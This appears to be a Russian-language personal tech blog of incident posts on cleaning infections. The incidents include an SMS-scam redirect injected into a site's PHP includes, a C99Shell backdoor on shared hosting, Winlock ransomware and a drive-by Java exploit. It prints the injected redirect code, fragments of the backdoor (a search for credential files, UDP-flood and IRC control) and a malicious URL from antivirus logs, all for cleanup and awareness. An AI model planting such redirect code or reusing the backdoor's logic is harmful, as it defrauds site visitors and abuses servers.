Антивирус Symantec уже довольно давно зарекомендовал себя с хорошей стороны - далеко не последние места в различных тестах антивирусов (ссылки не привожу, т.к. лучше ориентироваться на актуальные тесты). Однако, сравнительно недавно появилась возможность скачать бесплатно антивирус Symantec (да-да.. без регистрации и без СМС :)) читать про бесплатный антивирус Symantec
Столкнулся с интересной ситуацией - сайт якобы для защиты от спам-пользователей просит ввести свой номер телефона.
В последнее время наш сайт регулярно стал подвергаться атакам со стороны спам ботов. Для предотвращения данной ситуации мы приняли решение ввести обязательную смс авторизацию для всех посетителей. Введите номер Вашего телефона, на него придет БЕСПЛАТНОЕ смс сообщение с кодом авторизации.
Однако, владелец сайта не в курсе такой защиты.. Как оказалось, вариаций может быть несколько (к примеру, предупреждение от Google об опасности на сайте и тд). При этом предупреждение закрывается без ввода CMC, но открывается через некоторое время. Вот код, который приводил к открытию:
< ?php
$rSite = '***.servehttp.com'; // имя сайта заменено
if(!isset($_SERVER['REQUEST_URI']))
$_SERVER['REQUEST_URI'] = '';
$redirectURL = 'http://'.$rSite.$_SERVER['REQUEST_URI'];
if(isset($_SERVER['HTTP_REFERER']) && !isset($_COOKIE['arx_tt']))
if(!preg_match("|^http://$rSite|i",$_SERVER['HTTP_REFERER'])){
setcookie('arx_tt','1',time()+4*3600,'/');
exit( '<script>document.location.href="'.$redirectURL.'";');
}
setcookie('arx_tt','1',time()+4*3600,'/');
Вредоносный код, который встраивается на сайт и требует ввести СМС был размещён явно “вручную” в include-файлах, которые подключались при выводе практически всех страниц..
При попытке открыть диспетчер устройств в Windows XP само окошко открывается, однако в диспетчере устройств пусто. То есть устройств нет вообще, даже компьютера 
Кроме того, некоторые устройства при подключении к компьютеру не определялись.
Немного погуглив, нашёл информацию про вирус Apropos, который можно вылечить при помощи бесплатной утилиты AproposFix - следует перегрузить компьютер в безопасном режиме, извлечь архив и запустить RunThis.bat, который после завершения работы сохранит файл отчёта.
На компьютере был установлен антивирус - поэтому способ был отложен на крайний случай.
Ещё одна ситуация, когда диспетчер задач может быть пустым - проблемы службы Plug And Play.
В разделе реестра HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PlugPlay следует прописать REG_EXPAND_SZ (Расширяемый строковый параметр) с именем ImagePath и значением %SystemRoot%\system32\services.exe
Нередки случаи получения писем от солидных сайтов/компаний, от крупных социальных сетей.. с информацией об изменении данных, условий или необходимостью проверить конфиденциальные данные. При этом в письме, которое оформлено в соответствующем стиле, присутствует ссылка, ведущая на сайт, который внешне похож, но на самом деле отличается от упоминаемого.
При попытке войти на такой сайт под своим логином/паролем, данные отправляются на “фиктивный” сайт, к злоумышленнику. Именно такой способ получения конфиденциальных данных и доступа к ним называется фишингом.
1. Мошенники рассылают тысячи сообщений электронной почты на адреса, выбранные случайным образом. Эти сообщения выглядят как письма от известной компании.
2. В сообщении электронной почты Вас могут настоятельно призывать нажать на ссылку, чтобы обновить учетные данные. Ссылка приведет Вас на веб-сайт мошенников, который имитирует настоящий сайт компании.
3. На сайте мошенников Вас попросят предоставить конфиденциальную информацию. Вы думаете, что предоставляете информацию надежной компании, но на самом деле, ее получает преступник.
Если веб-сайт запрашивает ввод конфиденциальной информации, проверьте, что в адресной строке браузера адрес начинается с “https”. Несколько раз следует проверить адрес сайта - часто мошенники подставляют опечатки или похожие символы (I и l , tk вместо kt) Можно воспользоваться проверенным способом - ввести адрес в поисковике - поисковик, как правило, выдает на первом месте “истинный” сайт, а не фишинговый.
Браузеры последних поколений используют общую базу фишинговых сайтов - при попытке зайти на такой сайт пользователю показывается предупреждение о том, что сайт “не является тем, за кого себя выдаёт”…
Будьте бдительны
Сообщение от хостера, краткий смысл которого примерно такой: файлом www/config.php создавалась критическая нагрузка на сетевую подсистему виртуального хостинга, отключаем до устранения проблемы.
Странно.. сайты не предназначены для обмена большими порциями информации, огромной посещаемости также нет. Откуда же берется критическая нагрузка? (причем нагрузка не на процессор или перерасход памяти.. а именно нагрузка на сеть?)
Беглый анализ показал, что ряд файлов имеет более позднюю дату создания… Среди них особо выделялись файлы с такими именами:
www\2ndindex.php
www\httpdocs.pl
www\config.php
www\indexfixer.php
Проверка файлов антивирусом Касперского выявила всего один вредоносный файл: троянская программа Backdoor.PHP.C99Shell.au www/2ndindex.php
Если заглянуть внутрь - без особого труда можно узреть “злонамеренное” поведение -
for($i=0;$i<65000;$i++){
$out .= ‘X’;
}
…
fwrite($fp, $out);
find / -type f -name service.pwd
m0f0 ddos priv8 by t0fx
sub udpflooder
скрипт коннектится к IRC :), и, управляется командами из чата…
и другое.
Если Вы получили сообщение о критической нагрузке на сеть, в особенности, если сайт “не громоздкий” и не работает “по сети” самостоятельно, то, лучше лишний раз перестраховаться и проверить. “Ниоткуда” нагрузка не берется.
Удачи!
На компьютере стояла лицензионная пятая версия “Доктор Веб”. Предложение “бесплатно обновить” на шестую доктор выдавал при каждом обновлении баз. Естественно, в какой-то момент щелкать на “спасибо не надо обновлять” надоело - было принято решение обновиться до шестой версии. Правда, после скачивания она ещё некоторое время полежала на компьютере.. до очередного предупреждения об обновлении..
После обновления с версии 5 на версию 6 DrWeb при загрузке стал выдавать предупреждение:
Ошибка SpiDer Gate
Не удалось найти действительный ключевой файл. Приложение будет закрыто.
При получении такого сообщения следует первым делом проверить лицензионный файл. Это можно сделать при помощи менеджера лицензий DrWeb (или заглянуть в файл .key в каталоге DrWeb и посмотреть в строке Applications=). Если лицензия не распространяется на SpiderGate и Mail - оба компонента можно смело удалять… После удаления сообщение о закрытии приложения появляться не будет. Еще можно раскошелиться на лицензию для DrWeb Security Space Pro с поддержкой этих компонентов. Все-таки web-антивирус не помешает.
UPD похожая ситуация, однако с лицензиями всё в порядке…
Причиной ошибки послужило “кэширование” в Windows Vista
удалите папку \Users\[ваше имя пользователя]\AppData\Local\VirtualStore\Program Files\DrWeb и перезагрузитесь.
http://forum.drweb.com/index.php?showtopic=278183
Пользуйтесь лицензионными антивирусами и не забывайте обновляться (настройте автоматическое обновление антивирусных баз)
Очередной порно информер, требующий для разблокировки Windows отправить SMS с кодом 1011424 на номер 5121. Эх, картинки нету… 
Сделан довольно оригинально - внешне напоминает Internet Explorer с открытым сайтом .com. Однако, если обратить внимание на стиль окон, видно, что это не совсем IE от Windows (да и с версей IE не ладится - значок от ie 6, а выглядит “под восьмерку”). И надпись - мол, мы не блокируем программы, мы не вирус Хотя, розовый стиль и легко одетые женщины уже порядком надоели…
Что ж… идем на сайт DrWeb и получаем код “1238396875″ (DrWeb позволяет отправлять бесплатные SMS на короткие номера???) . Конечно, вирус этот код не удалит, однако первое время работать можно будет.
Ручными поисками заниматься не стал - прогнал компьютер LiveCD со свежими базами. (вирус с бородой попался)
Нашел кучу всякой гадости типа NtRootkit в system_volume_information, Officla48 (в одном из tmp файлов и в C:\windows\srnh.lto). Последнее подгружалось в реестре (”расширенный” boot, shell до Explorer.exe rundll32.exe srnh.lto iqfnr). Чистим до просто “Explorer”, не забываем поставить свежий антивирус.. и всё.
Удачи
Очередной вирус из серии “отправь СМС и разблокируй компьютер” (Winlock) с текстом T701016100 (Т701016100) на короткий номер 3381.
При загрузке всех программ из автозагрузки вылетает куча сообщений об ошибке “память не может быть written”. Чуть позже появляется баннер, закрывающий центральную часть экрана. Опять же розовый фон, порно-банер и дамы из фильмов по бокам (почти как при установке баннера для доступа на наш сайт) В разблокираторах от DrWeb и Kaspersky информации о таком номере, вирусе, баннере пока нет. Сканирование CureIt-ом выявило 6 файлов с тремя разными вирусами (один из них - разновидность winlock-а). Однако, после перезагрузки почти сразу появился порно баннер.
Касперский, нод и антивирусные утилиты не запускаются.
Для временной разблокировки подошел код “279346830“, (подсмотрено на форуме - номер 3381 текст Т701016100 код F64W28E - не проверял.) Однако, естественно, что введенный код не гарантирует полного удаления программы с компьютера. Он вообще ничего не гарантирует - только (в лучшем случае) позволяет на некоторое время возобновить работу компьютера.
Загрузка с LiveCD (WinPE, можно записанный на USB), привязка реестра системного диска и просмотр утилитой HIjackThis выявил пару “сомнительных строчек”:
F2 - REG:system.ini: Shell=Explorer.exe rundll32.exe srnh.lto iqfnr
F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\… (далее следует довольно внушительный список exe-файлов с сомнительными именами)
Предварительно лучше вычистить все эти файлы (я копирую в отдельный каталог для “вирусов”, чтобы после лечения отправить, например, на virustotal - на момент отправки, обычно, вирус в файле распознают не больше 7-8 антивирусных программ.)
Отмечаем сомнительные пункты галочкой и кнопкой “FixIt” (не выходя из ХайДжека) автоматически исправляем значения реестра.
Про методы лечения можно посмотерть в статьях про блокирующий компьютер “липовый” Internet Security, Ubest NetSpeed Pro. Если судить по предыдущим подобным вирусным “блокираторам”, то в скором времени (не позднее пары дней) антивирусы внесут информацию о нем в базы.
UPD. Действительно, CureIt с новыми базами (от 21.05.2010) нашла две DLL-ки с короткими именами (bx.dll и mx.dll) в %WINDIR%\system32 с вирусом WIN32.HLLW.Autoruner.21042
После посещения сайта (ссылку приводить не буду - в подвале сайта, как довольно часто случается прописался злостный javascript-вирус, который потянул за собой ещё кучу вирусов) Нод выдал кучу предупреждений:
IMON file http://gripgrate.ru:8080/Applet1.html JS/Exploit.JavaDepKit.A trojan
AMON file C:\WINDOWS\system32\fjhdyfhsn.bat BAT/KillFiles.NCB trojan quarantined - deleted Event occurred on a modified file. The file was moved to quarantine. You may close this window.
AMON file C:\WINDOWS\system32\fjhdyfhsn.bat BAT/KillFiles.NCB trojan quarantined - deleted Event occurred on a modified file. The file was moved to quarantine. You may close this window.
И дальше - куча вирусов вида:
AMON file C:\WINDOWS\system32\drivers\atmarpc.sys Win32/Bubnix.AH trojan quarantined - deleted Event occurred on a new file created by the application: C:\Program Files\Internet Explorer\iexplore.exe. The file was moved to quarantine. You may close this window.
AMON file C:\WINDOWS\system32\drivers\asyncmac.sys Win32/Bubnix.AH trojan quarantined - deleted Event occurred on a new file created by the application: C:\Program Files\Internet Explorer\iexplore.exe. The file was moved to quarantine. You may close this window.
AMON file C:\WINDOWS\system32\drivers\aec.sys Win32/Bubnix.AH trojan quarantined - deleted Event occurred on a new file created by the application: C:\Program Files\Internet Explorer\iexplore.exe. The file was moved to quarantine. You may close this window.
ПО поводу первого нашел только у ESET (наверное, у остальных антивирусов он по-другому называется)
http://www.eset.com/blog/2010/04/15/unpatched-java-deployment-kit-vulnerability-exploited-in-the-wild
Гадость эта прописывается ещё и в автозагрузку.
C:\WINDOWS\system32\fjhdyfhsn.bat BAT/KillFiles.NCB trojan
Проверка drweb CureIt выявила парочку вирусов. Однако, компьютер так и не загрузился. Kaspersky AVP Tool нашел вирусы в каталогах Java. Однако, загрузка так и не “пошла” - после входа в windows появляется рабочий стол, однако, похоже, куча служб “зависает” и подвешивает систему - мышка ходит, над “Пуском” крутятся часики, однако никаких других действий выполнить нельзя.
В каталоге System32/drivers нашел файлы .sys.bak (aec.sys.bak, asyncmac.sys.bak, cdaudio.sys.bak) - видимо, зараза аккуратно забэкапилась Или удалить не получилось. Скопировал оригинальные.
Очередная зараза..Черные квадратики
После включения предупреждений обнаружил, что services.exe ломится на seozavrsss.com
В каталоге system32 несколько “подписанных” файлов с иконками в виде черных квадратов (тоже мне, Малевичи..) . Что характерно, у файлов был разный размер (83968 и 78848) и разные результаты по определению на virustotal
Результаты проверки файла LnnCegn.exe на virustotal: 6/42 (14.29%)
| Файл bDI8Lbn.exe получен 2010.03.29 10:01:30 (UTC) | |||
| Антивирус | Версия | Обновление | Результат |
| AVG | 9.0.0.787 | 2010.03.29 | SHeur3.NNU |
| CAT-QuickHeal | 10.00 | 2010.03.29 | (Suspicious) - DNAScan |
| Comodo | 4424 | 2010.03.29 | TrojWare.Win32.Trojan.Agent.Gen |
| Prevx | 3.0 | 2010.03.29 | High Risk Cloaked Malware |
| Sunbelt | 6112 | 2010.03.29 | Trojan.Win32.Generic.pak!cobra |
| Symantec | 20091.2.0.41 | 2010.03.29 | Suspicious.Insight |
| Дополнительная информация | |||
| File size: 83968 bytes | |||
| MD5 : 9865344469b8a56658c5d42b303fd1d4 | |||
у файла RpMk9en.exe размером 78848 байт (тоже “черный квадрат”) процент определения получше, но далеко от сотни:
| Файл fQGJclM.exe получен 2010.03.18 15:59:19 (UTC) | |||
| Антивирус | Версия | Обновление | Результат |
| Avast | 4.8.1351.0 | 2010.03.18 | Win32:Malware-gen |
| Avast5 | 5.0.332.0 | 2010.03.18 | Win32:Malware-gen |
| AVG | 9.0.0.787 | 2010.03.18 | SHeur3.GGO |
| CAT-QuickHeal | 10.00 | 2010.03.18 | (Suspicious) - DNAScan |
| Comodo | 4305 | 2010.03.18 | TrojWare.Win32.Trojan.Agent.Gen |
| DrWeb | 5.0.1.12222 | 2010.03.18 | Trojan.Packed.19777 |
| GData | 19 | 2010.03.18 | Win32:Malware-gen |
| Kaspersky | 7.0.0.125 | 2010.03.18 | Trojan.Win32.Scar.bwas |
| NOD32 | 4955 | 2010.03.18 | a variant of Win32/Kryptik.DBM |
| Panda | 10.0.2.2 | 2010.03.18 | Suspicious file |
| Sunbelt | 5952 | 2010.03.18 | Trojan.Win32.Generic.pak!cobra |
| Symantec | 20091.2.0.41 | 2010.03.18 | Suspicious.Insight |
| TrendMicro | 9.120.0.1004 | 2010.03.18 | TROJ_AGENT.SMH |
| Дополнительная информация | |||
| File size: 78848 bytes | |||
| MD5 : d238db1969b8f0b06dff9f2b070dd468 | |||
Многие распространенные антивирусы пока “молчат” - значит или “показалось”, или ждать беды.
Хотя, судя по датам, второй просто более ранняя версия, а первый получился после модификации этого второго. Если все правильно, то где-то в загрузке должен быть запуск “последней версии”
И действительно, в логах HiJackThis нашел такое:
F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\e25a76c4.exe,\\?\globalroot\systemroot\system32\feyTk89.exe,\\?\globalroot\systemroot\system32\LnnCegn.exe,
feyTk89.exe пару дней назад был опознан и удален. А вот LnnCegn неплохо устроился в system32.
Почистил. Пока работает. Файлы заслал “куда надо” - может чего скажут…
ps. При попытке зайти в “назначенные задания” компьютер вылетел с синим экраном.
pps http://www.malwaredomainlist.com/mdl.php?search=seozavrsss&colsearch=All - информации о seozavrsss.com не так уж много. Других сайтов по поиску не нашлось
ppps Касперский прислал отчет - 3 файла из отправленных - вирусы. а вот 4 (тот который на virustotal не определился) - не знаю :) мол, будем посмотреть.
